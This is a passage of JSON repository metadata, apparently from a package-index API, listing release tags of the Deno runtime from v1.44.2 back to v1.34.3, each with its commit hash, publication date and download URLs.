01feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252